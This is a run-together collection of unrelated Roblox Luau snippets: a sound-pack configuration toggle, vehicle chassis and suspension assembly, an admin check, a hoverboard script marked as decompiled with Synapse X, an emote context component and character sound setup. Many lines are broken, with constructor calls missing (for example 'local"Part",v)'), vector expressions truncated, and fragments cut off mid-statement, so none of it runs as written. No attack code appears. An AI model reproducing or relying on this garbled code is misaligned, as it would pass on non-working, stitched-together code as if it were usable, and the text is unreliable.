if Configuration.PrintingEnabled == false then else print("DOORS 👁️ Sound Pack: Installing Musics/Ambiences Sounds...") end if Configuration.SoundsInSoundService == true then Folder = game.SoundService end if Configuration.MusicLobbyEnabled == false then Folder.Music.Lobby:Destroy() end if Configuration.GuidingLightMusicEnabled == false then Folder.Music["Guiding Light"]:Destroy() end if Configuration.EndingMusicEnabled == false then Folder.Music.Ending:Destroy() end if Configuration.ElevatorJamMusicEnabled == false then Folder.Music["Elevator Jam"]:Destroy() end if Configuration.UnhingedMusicEnabled == false then Folder.Music.Unhinged:Destroy() end if Configuration.AmbienceSoundEnabled == false then Folder.Ambience.Ambience:Destroy() end
--[[Chassis Assembly]]
--Create Steering Axle local"Part",v) arm.Name="Arm" arm.Anchored=true arm.CanCollide=false arm.FormFactor=Enum.FormFactor.Custom,_Tune.AxleSize,_Tune.AxleSize) arm.CFrame=(v.CFrame*,_Tune.StAxisOffset,0))*CFrame.Angles(-math.pi/2,-math.pi/2,0) arm.CustomPhysicalProperties =,0,0,100,100) arm.TopSurface=Enum.SurfaceType.Smooth arm.BottomSurface=Enum.SurfaceType.Smooth arm.Transparency=1 --Create Wheel Spindle local base=arm:Clone() base.Parent=v base.Name="Base" base.CFrame=base.CFrame*,_Tune.AxleSize,0) base.BottomSurface=Enum.SurfaceType.Hinge --Create Steering Anchor local axle=arm:Clone() axle.Parent=v axle.Name="Axle"*CFrame.Angles(math.pi/2,0,0)).lookVector*((v.Size.x/2)+(axle.Size.x/2))),v.Position)*CFrame.Angles(0,math.pi,0) axle.BackSurface=Enum.SurfaceType.Hinge --Create Powered Axle (LuaInt) local axlep=arm:Clone() axlep.Parent=v axlep.Name='AxleP' axlep.CFrame=v.CFrame MakeWeld(axlep,axle) if v.Name=="F" or v.Name=="R" then local axle2=arm:Clone() axle2.Parent=v axle2.Name="Axle"*CFrame.Angles(math.pi/2,0,0)).lookVector*((v.Size.x/2)+(axle2.Size.x/2))),v.Position)*CFrame.Angles(0,math.pi,0) axle2.BackSurface=Enum.SurfaceType.Hinge MakeWeld(arm,axle2) end --Create Suspension if _Tune.SusEnabled then local sa=arm:Clone() sa.Parent=v sa.Name="#SA" if v.Name == "FL" or v.Name=="FR" or v.Name =="F" then local aOff = _Tune.FAnchorOffset sa.CFrame=v.CFrame*,-fDistX,-fDistY)*[3],aOff[1],-aOff[2])*CFrame.Angles(-math.pi/2,-math.pi/2,0) else local aOff = _Tune.RAnchorOffset sa.CFrame=v.CFrame*,-rDistX,-rDistY)*[3],aOff[1],-aOff[2])*CFrame.Angles(-math.pi/2,-math.pi/2,0) end local sb=sa:Clone() sb.Parent=v sb.Name="#SB" sb.CFrame=sa.CFrame*,0,_Tune.AxleSize) sb.FrontSurface=Enum.SurfaceType.Hinge local g ="BodyGyro",sb) g.Name = "Stabilizer" g.MaxTorque =,0,1) g.P = 0 local sf1 ="Attachment",sa) sf1.Name = "SAtt" local sf2 = sf1:Clone() sf2.Parent = sb --(Avxnturador) adds spring offset if v.Name == "FL" or v.Name == "FR" or v.Name == "F" then local aOff = _Tune.FSpringOffset if v.Name == "FL" then sf1.Position =[1],-fDistY+fSLY+aOff[2],_Tune.AxleSize/2+aOff[3]) sf2.Position =[1],-fDistY+aOff[2],-_Tune.AxleSize/2+aOff[3]) else sf1.Position =[1],-fDistY+fSLY+aOff[2],_Tune.AxleSize/2-aOff[3]) sf2.Position =[1],-fDistY+aOff[2],-_Tune.AxleSize/2-aOff[3]) end elseif v.Name == "RL" or v.Name=="RR" or v.Name == "R" then local aOff = _Tune.RSpringOffset if v.Name == "RL" then sf1.Position =[1],-rDistY+rSLY+aOff[2],_Tune.AxleSize/2+aOff[3]) sf2.Position =[1],-rDistY+aOff[2],-_Tune.AxleSize/2+aOff[3]) else sf1.Position =[1],-rDistY+rSLY+aOff[2],_Tune.AxleSize/2-aOff[3]) sf2.Position =[1],-rDistY+aOff[2],-_Tune.AxleSize/2-aOff[3]) end end sb:MakeJoints() --(LuaInt) there was axle:makejoints here I believe, but the new powered axle manually welds itself so I ditched it local sp ="SpringConstraint",v) sp.Name = "Spring" sp.Attachment0 = sf1 sp.Attachment1 = sf2 sp.LimitsEnabled = true sp.Visible=_Tune.SusVisible sp.Radius=_Tune.SusRadius sp.Thickness=_Tune.SusThickness sp.Coils=_Tune.SusCoilCount if v.Name == "FL" or v.Name=="FR" or v.Name =="F" then g.D = _Tune.FAntiRoll sp.Damping = _Tune.FSusDamping sp.Stiffness = _Tune.FSusStiffness sp.FreeLength = _Tune.FSusLength+_Tune.FPreCompress sp.MaxLength = _Tune.FSusLength+_Tune.FExtensionLim sp.MinLength = _Tune.FSusLength-_Tune.FCompressLim else g.D = _Tune.RAntiRoll sp.Damping = _Tune.RSusDamping sp.Stiffness = _Tune.RSusStiffness sp.FreeLength = _Tune.RSusLength+_Tune.RPreCompress sp.MaxLength = _Tune.RSusLength+_Tune.RExtensionLim sp.MinLength = _Tune.RSusLength-_Tune.RCompressLim end MakeWeld(car.DriveSeat,sa) MakeWeld(sb,base) else MakeWeld(car.DriveSeat,base) end --Lock Rear Steering Axle if _Tune.FWSteer=='Static' or _Tune.FWSteer=='Speed' or _Tune.FWSteer=='Both' then else if v.Name == "RL" or v.Name == "RR" or v.Name=="R" then MakeWeld(base,axle) end end --Weld Assembly if v.Parent.Name == "RL" or v.Parent.Name == "RR" or v.Name=="R" then MakeWeld(car.DriveSeat,arm) end MakeWeld(arm,axle) arm:MakeJoints() --Weld Miscelaneous Parts if v:FindFirstChild("SuspensionFixed")~=nil then ModelWeld(v.SuspensionFixed,car.DriveSeat) end if v:FindFirstChild("WheelFixed")~=nil then ModelWeld(v.WheelFixed,axle) end if v:FindFirstChild("Fixed")~=nil then ModelWeld(v.Fixed,arm) end --Weld Wheel Parts if v:FindFirstChild("Parts")~=nil then ModelWeld(v.Parts,v) end --Add Steering Gyro if v:FindFirstChild("Steer") then v:FindFirstChild("Steer"):Destroy() end if v.Name=='FR' or v.Name=='FL' or v.Name=='F' then local"BodyGyro",arm) steer.Name="Steer" steer.P=_Tune.SteerP steer.D=_Tune.SteerD,_Tune.SteerMaxTorque,0) steer.cframe=v.CFrame*CFrame.Angles(0,-math.pi/2,0) else if (_Tune.FWSteer=='Static' or _Tune.FWSteer=='Speed' or _Tune.FWSteer=='Both') then local"BodyGyro",arm) steer.Name="Steer" if _Tune.RSteerP~=nil and _Tune.RSteerD~=nil and _Tune.RSteerMaxTorque~=nil then steer.P=_Tune.RSteerP steer.D=_Tune.RSteerD,_Tune.RSteerMaxTorque,0) else steer.P=_Tune.SteerP steer.D=_Tune.SteerD,_Tune.SteerMaxTorque,0) end steer.cframe=v.CFrame*CFrame.Angles(0,-math.pi/2,0) end end --Add Stabilization Gyro local"BodyGyro",v) gyro.Name="Stabilizer",0,1) gyro.P=0 if v.Name=="FL" or v.Name=="FR" or v.Name=="F" then gyro.D=_Tune.FGyroDamp else gyro.D=_Tune.RGyroDamp end --Add Motors (LuaInt) local"HingeConstraint",v) AV.ActuatorType='Motor'"Attachment",v.AxleP) v.AxleP.Attachment.Name='AA'"Attachment",v) v.Attachment.Name='AB' AV.Name="#AV" AV.AngularVelocity=0 AV.MotorMaxTorque=0 local"HingeConstraint",v) BV.ActuatorType='Motor'"Attachment",v.AxleP) v.AxleP.Attachment.Name='BA'"Attachment",v) v.Attachment.Name='BB' BV.Name="#BV" BV.AngularVelocity=0 BV.MotorMaxTorque=_Tune.PBrakeForce for _,c in pairs(v:GetDescendants()) do if c.ClassName=='Attachment' and c.Name~='SAtt' then if c.Parent.Name=='FL' or c.Parent.Name=='RL' or c.Parent.Parent.Name=='FL' or c.Parent.Parent.Name=='RL' then,0,90) end if c.Parent.Name=='F' or c.Parent.Name=='R' or c.Parent.Parent.Name=='F' or c.Parent.Parent.Name=='R' or c.Parent.Name=='FR' or c.Parent.Name=='RR' or c.Parent.Parent.Name=='FR' or c.Parent.Parent.Name=='RR' then,0,90) end end end end
local ITEM_NAME = "Pistol" local ITEM_PRICE = 10 local CURRENCY_NAME = "Cash"
--Check if new player is admin
for v,numberObject in pairs(Administrators:GetChildren()) do if numberObject.Value == player.userId then wait()
-- Decompiled with the Synapse X Luau decompiler.
local v1 = require(game.ReplicatedStorage:WaitForChild("Resources")); while not v1.Loaded do game:GetService("RunService").Heartbeat:Wait(); end; local l__StarterPlayer__2 = v1.StarterPlayer; local l__CollectionService__3 = v1.CollectionService; local l__Hoverboards__1 = v1.Directory.Hoverboards; local u2 = nil; function Create(p1) local l____HOVERBOARD__4 = v1.PlayerModule.Get("Character", p1):FindFirstChild("__HOVERBOARD"); if l____HOVERBOARD__4 then l____HOVERBOARD__4:Destroy(); end; local v5 = v1.StatService.Get(p1); if v5 then if not v5.Hoverboard then return; end; else return; end; local v6 = l__Hoverboards__1[v5.Hoverboard]; if not v6 then return; end; local v7 = v1.PlayerModule.Get("Humanoid"); local v8 = v1.PlayerModule.Get("RootPart"); if v7 then if v8 then u2 = v7.HipHeight; v8.CFrame = v8.CFrame +, v7.HipHeight - v6.HipHeight, 0); v7.HipHeight = v6.HipHeight; v7.AutoJumpEnabled = false; end; end; end; local l__LocalPlayer__3 = v1.LocalPlayer; function Remove(p2) local v9 = v1.PlayerModule.Get("Humanoid"); local v10 = v1.PlayerModule.Get("RootPart"); if v9 then if v10 then if p2 == l__LocalPlayer__3 then v10.Velocity =; end; if u2 then v9.HipHeight = u2; u2 = nil; end; v9.AutoJumpEnabled = true; end; end; end; function UpdatePlayer(p3, p4) local v11 = v1.PlayerModule.Get("Character", p3); if p4 then if not v11:FindFirstChild("__HOVERBOARD") then return Create(p3); end; end; if not p4 then if v11:FindFirstChild("__HOVERBOARD") then Remove(p3); end; end; end; function Toggle() v1.Variables.UsingHoverboard = not v1.Variables.UsingHoverboard; if not v1.Variables.UsingHoverboard then Remove(l__LocalPlayer__3); else Create(l__LocalPlayer__3); end; v1.Network.Fire("Update Hoverboard State", v1.Variables.UsingHoverboard); end; l__CollectionService__3:GetInstanceAddedSignal("UsingHoverboard"):Connect(function(p5) UpdatePlayer(p5, true); end); l__CollectionService__3:GetInstanceRemovedSignal("UsingHoverboard"):Connect(function(p6) UpdatePlayer(p6, false); end); task.defer(function() while v1.Variables.LoadingWorld do v1.Heartbeat(); end; for v12, v13 in ipairs((l__CollectionService__3:GetTagged("UsingHoverboard"))) do coroutine.wrap(UpdatePlayer)(v13, true); end; end); v1.Signal.Fired("Stat Changed"):Connect(function(p7) end); v1.Signal.Fired("Changed Platform"):Connect(function() end); v1.Signal.Fired("World Changed"):Connect(function() if v1.Variables.UsingHoverboard then Toggle(); end; end);
local GJK = require(script:WaitForChild("GJK")) local Supports = require(script:WaitForChild("Supports")) local Vertices = require(script:WaitForChild("Vertices"))
--[[ Higher order component that lets the wrapped component consume the EmoteContext. ]]
local function withEmoteContext(component) return function(props) if props.emoteContext then warn("Child component has a prop named `emoteContext` and will be overriden by EmoteContext.") end return Roact.createElement(Context.Consumer, { render = function(emoteContext) local mergedProps = Cryo.Dictionary.join({ emoteContext = emoteContext }, props) return Roact.createElement(component, mergedProps) end, }) end end local EmoteContext = { Consumer = Context.Consumer, Provider = withConfiguration(EmoteContextProvider), withEmoteContext = withEmoteContext, } return EmoteContext
-- declarations
local sGettingUp = newSound("rbxasset://sounds/action_get_up.mp3") local sDied = newSound("rbxasset://sounds/uuhhh.mp3") local sFreeFalling = newSound("rbxasset://sounds/action_falling.mp3") local sJumping = newSound("rbxasset://sounds/action_jump.mp3") local sLanding = newSound("rbxasset://sounds/action_jump_land.mp3") local sSplash = newSound("rbxasset://sounds/impact_water.mp3") local sRunning = newSound("rbxasset://sounds/action_footsteps_plastic.mp3") sRunning.Looped = true local sSwimming = newSound("rbxasset://sounds/action_swim.mp3") sSwimming.Looped = true local sClimbing = newSound("rbxasset://sounds/action_footsteps_plastic.mp3") sClimbing.Looped = true local Figure = script.Parent local Head = waitForChild(Figure, "Head") local Humanoid = waitForChild(Figure, "Humanoid") local prevState = "None"